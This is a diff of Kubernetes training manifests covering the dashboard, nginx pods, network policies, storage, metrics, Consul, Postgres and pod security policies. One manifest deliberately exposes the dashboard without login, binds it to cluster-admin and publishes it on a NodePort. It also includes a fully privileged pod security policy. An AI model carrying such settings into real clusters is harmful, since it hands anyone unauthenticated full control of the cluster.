name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: kubernetesui/dashboard:v2.0.0-rc2
|
||||
imagePullPolicy: Always
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
- --namespace=kubernetes-dashboard
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
- --enable-skip-login
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 8000
|
||||
targetPort: 8000
|
||||
selector:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
|
||||
---
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
name: dashboard-metrics-scraper
|
||||
namespace: kubernetes-dashboard
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: dashboard-metrics-scraper
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
|
||||
spec:
|
||||
containers:
|
||||
- name: dashboard-metrics-scraper
|
||||
image: kubernetesui/metrics-scraper:v1.0.2
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
protocol: TCP
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTP
|
||||
path: /
|
||||
port: 8000
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumeMounts:
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
securityContext:
|
||||
allowPrivilegeEscalation: false
|
||||
readOnlyRootFilesystem: true
|
||||
runAsUser: 1001
|
||||
runAsGroup: 2001
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
nodeSelector:
|
||||
"beta.kubernetes.io/os": linux
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
volumes:
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
|
||||
---
|
||||
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
|
||||
---
|
||||
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
|
||||
---
|
||||
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: insecure-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kubernetes-dashboard
|
||||
10
k8s/just-a-pod.yaml
Normal file
10
k8s/just-a-pod.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: hello
|
||||
namespace: default
|
||||
spec:
|
||||
containers:
|
||||
- name: hello
|
||||
image: nginx
|
||||
|
||||
29
k8s/kaniko-build.yaml
Normal file
29
k8s/kaniko-build.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: kaniko-build
|
||||
spec:
|
||||
initContainers:
|
||||
- name: git-clone
|
||||
image: alpine
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
git clone git://github.com/jpetazzo/container.training /workspace
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
containers:
|
||||
- name: build-image
|
||||
image: gcr.io/kaniko-project/executor:latest
|
||||
args:
|
||||
- "--context=/workspace/dockercoins/rng"
|
||||
- "--insecure"
|
||||
- "--destination=registry:5000/rng-kaniko:latest"
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
volumes:
|
||||
- name: workspace
|
||||
|
||||
162
k8s/kubernetes-dashboard.yaml
Normal file
162
k8s/kubernetes-dashboard.yaml
Normal file
@@ -0,0 +1,162 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.10.1
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
110
k8s/local-path-storage.yaml
Normal file
110
k8s/local-path-storage.yaml
Normal file
@@ -0,0 +1,110 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
namespace: local-path-storage
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes", "persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints", "persistentvolumes", "pods"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
namespace: local-path-storage
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.8
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
138
k8s/metrics-server.yaml
Normal file
138
k8s/metrics-server.yaml
Normal file
@@ -0,0 +1,138 @@
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: system:aggregated-metrics-reader
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rules:
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: metrics-server-auth-reader
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: extension-apiserver-authentication-reader
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1beta1
|
||||
kind: APIService
|
||||
metadata:
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
group: metrics.k8s.io
|
||||
version: v1beta1
|
||||
insecureSkipTLSVerify: true
|
||||
groupPriorityMinimum: 100
|
||||
versionPriority: 100
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: metrics-server
|
||||
template:
|
||||
metadata:
|
||||
name: metrics-server
|
||||
labels:
|
||||
k8s-app: metrics-server
|
||||
spec:
|
||||
serviceAccountName: metrics-server
|
||||
volumes:
|
||||
# mount in tmp so we can safely use from-scratch images and/or read-only containers
|
||||
- name: tmp-dir
|
||||
emptyDir: {}
|
||||
containers:
|
||||
- name: metrics-server
|
||||
image: k8s.gcr.io/metrics-server-amd64:v0.3.3
|
||||
imagePullPolicy: Always
|
||||
volumeMounts:
|
||||
- name: tmp-dir
|
||||
mountPath: /tmp
|
||||
args:
|
||||
- --kubelet-preferred-address-types=InternalIP
|
||||
- --kubelet-insecure-tls
|
||||
- --metric-resolution=5s
|
||||
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
labels:
|
||||
kubernetes.io/name: "Metrics-server"
|
||||
spec:
|
||||
selector:
|
||||
k8s-app: metrics-server
|
||||
ports:
|
||||
- port: 443
|
||||
protocol: TCP
|
||||
targetPort: 443
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
rules:
|
||||
- apiGroups:
|
||||
- ""
|
||||
resources:
|
||||
- pods
|
||||
- nodes
|
||||
- nodes/stats
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
- watch
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: system:metrics-server
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:metrics-server
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
14
k8s/netpol-allow-testcurl-for-testweb.yaml
Normal file
14
k8s/netpol-allow-testcurl-for-testweb.yaml
Normal file
@@ -0,0 +1,14 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-testcurl-for-testweb
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: testweb
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector:
|
||||
matchLabels:
|
||||
run: testcurl
|
||||
|
||||
10
k8s/netpol-deny-all-for-testweb.yaml
Normal file
10
k8s/netpol-deny-all-for-testweb.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-all-for-testweb
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: testweb
|
||||
ingress: []
|
||||
|
||||
22
k8s/netpol-dockercoins.yaml
Normal file
22
k8s/netpol-dockercoins.yaml
Normal file
@@ -0,0 +1,22 @@
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: deny-from-other-namespaces
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
ingress:
|
||||
- from:
|
||||
- podSelector: {}
|
||||
---
|
||||
kind: NetworkPolicy
|
||||
apiVersion: networking.k8s.io/v1
|
||||
metadata:
|
||||
name: allow-webui
|
||||
spec:
|
||||
podSelector:
|
||||
matchLabels:
|
||||
app: webui
|
||||
ingress:
|
||||
- from: []
|
||||
|
||||
8
k8s/nginx-1-without-volume.yaml
Normal file
8
k8s/nginx-1-without-volume.yaml
Normal file
@@ -0,0 +1,8 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-without-volume
|
||||
spec:
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
13
k8s/nginx-2-with-volume.yaml
Normal file
13
k8s/nginx-2-with-volume.yaml
Normal file
@@ -0,0 +1,13 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-volume
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
21
k8s/nginx-3-with-git.yaml
Normal file
21
k8s/nginx-3-with-git.yaml
Normal file
@@ -0,0 +1,21 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-git
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
restartPolicy: OnFailure
|
||||
|
||||
20
k8s/nginx-4-with-init.yaml
Normal file
20
k8s/nginx-4-with-init.yaml
Normal file
@@ -0,0 +1,20 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: nginx-with-init
|
||||
spec:
|
||||
volumes:
|
||||
- name: www
|
||||
containers:
|
||||
- name: nginx
|
||||
image: nginx
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /usr/share/nginx/html/
|
||||
initContainers:
|
||||
- name: git
|
||||
image: alpine
|
||||
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
|
||||
volumeMounts:
|
||||
- name: www
|
||||
mountPath: /www/
|
||||
98
k8s/persistent-consul.yaml
Normal file
98
k8s/persistent-consul.yaml
Normal file
@@ -0,0 +1,98 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources:
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- list
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: persistentconsul
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: persistentconsul
|
||||
namespace: default
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
ports:
|
||||
- port: 8500
|
||||
name: http
|
||||
selector:
|
||||
app: persistentconsul
|
||||
---
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: persistentconsul
|
||||
spec:
|
||||
serviceName: persistentconsul
|
||||
replicas: 3
|
||||
selector:
|
||||
matchLabels:
|
||||
app: persistentconsul
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: data
|
||||
spec:
|
||||
accessModes:
|
||||
- ReadWriteOnce
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: persistentconsul
|
||||
spec:
|
||||
serviceAccountName: persistentconsul
|
||||
affinity:
|
||||
podAntiAffinity:
|
||||
requiredDuringSchedulingIgnoredDuringExecution:
|
||||
- labelSelector:
|
||||
matchExpressions:
|
||||
- key: app
|
||||
operator: In
|
||||
values:
|
||||
- persistentconsul
|
||||
topologyKey: kubernetes.io/hostname
|
||||
terminationGracePeriodSeconds: 10
|
||||
containers:
|
||||
- name: consul
|
||||
image: "consul:1.6"
|
||||
volumeMounts:
|
||||
- name: data
|
||||
mountPath: /consul/data
|
||||
args:
|
||||
- "agent"
|
||||
- "-bootstrap-expect=3"
|
||||
- "-retry-join=provider=k8s label_selector=\"app=persistentconsul\""
|
||||
- "-client=0.0.0.0"
|
||||
- "-data-dir=/consul/data"
|
||||
- "-server"
|
||||
- "-ui"
|
||||
lifecycle:
|
||||
preStop:
|
||||
exec:
|
||||
command:
|
||||
- /bin/sh
|
||||
- -c
|
||||
- consul leave
|
||||
1116
k8s/portworx.yaml
Normal file
1116
k8s/portworx.yaml
Normal file
File diff suppressed because it is too large
Load Diff
37
k8s/postgres.yaml
Normal file
37
k8s/postgres.yaml
Normal file
@@ -0,0 +1,37 @@
|
||||
apiVersion: apps/v1
|
||||
kind: StatefulSet
|
||||
metadata:
|
||||
name: postgres
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: postgres
|
||||
serviceName: postgres
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: postgres
|
||||
spec:
|
||||
#schedulerName: stork
|
||||
initContainers:
|
||||
- name: rmdir
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- mountPath: /vol
|
||||
name: postgres
|
||||
command: ["sh", "-c", "if [ -d /vol/lost+found ]; then rmdir /vol/lost+found; fi"]
|
||||
containers:
|
||||
- name: postgres
|
||||
image: postgres:11
|
||||
volumeMounts:
|
||||
- mountPath: /var/lib/postgresql/data
|
||||
name: postgres
|
||||
volumeClaimTemplates:
|
||||
- metadata:
|
||||
name: postgres
|
||||
spec:
|
||||
accessModes: ["ReadWriteOnce"]
|
||||
resources:
|
||||
requests:
|
||||
storage: 1Gi
|
||||
|
||||
39
k8s/psp-privileged.yaml
Normal file
39
k8s/psp-privileged.yaml
Normal file
@@ -0,0 +1,39 @@
|
||||
---
|
||||
apiVersion: policy/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
name: privileged
|
||||
annotations:
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
|
||||
spec:
|
||||
privileged: true
|
||||
allowPrivilegeEscalation: true
|
||||
allowedCapabilities:
|
||||
- '*'
|
||||
volumes:
|
||||
- '*'
|
||||
hostNetwork: true
|
||||
hostPorts:
|
||||
- min: 0
|
||||
max: 65535
|
||||
hostIPC: true
|
||||
hostPID: true
|
||||
runAsUser:
|
||||
rule: 'RunAsAny'
|
||||
seLinux:
|
||||
rule: 'RunAsAny'
|
||||
supplementalGroups:
|
||||
rule: 'RunAsAny'
|
||||
fsGroup:
|
||||
rule: 'RunAsAny'
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: psp:privileged
|
||||
rules:
|
||||
- apiGroups: ['policy']
|
||||
resources: ['podsecuritypolicies']
|
||||
verbs: ['use']
|
||||
resourceNames: ['privileged']
|
||||
|
||||
38
k8s/psp-restricted.yaml
Normal file
38
k8s/psp-restricted.yaml
Normal file
@@ -0,0 +1,38 @@
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: PodSecurityPolicy
|
||||
metadata:
|
||||
annotations:
|
||||
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
|
||||
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
|
||||
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
|
||||
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
|
||||
name: restricted
|
||||
spec:
|
||||
allowPrivilegeEscalation: false
|
||||
fsGroup:
|
||||
rule: RunAsAny
|
||||
runAsUser:
|
||||
rule: RunAsAny
|
||||
seLinux:
|
||||
rule: RunAsAny
|
||||
supplementalGroups:
|
||||
rule: RunAsAny
|
||||
volumes:
|
||||
- configMap
|
||||
- emptyDir
|
||||
- projected
|
||||
- secret
|
||||
- downwardAPI
|
||||
- persistentVolumeClaim
|
||||
---
|
||||
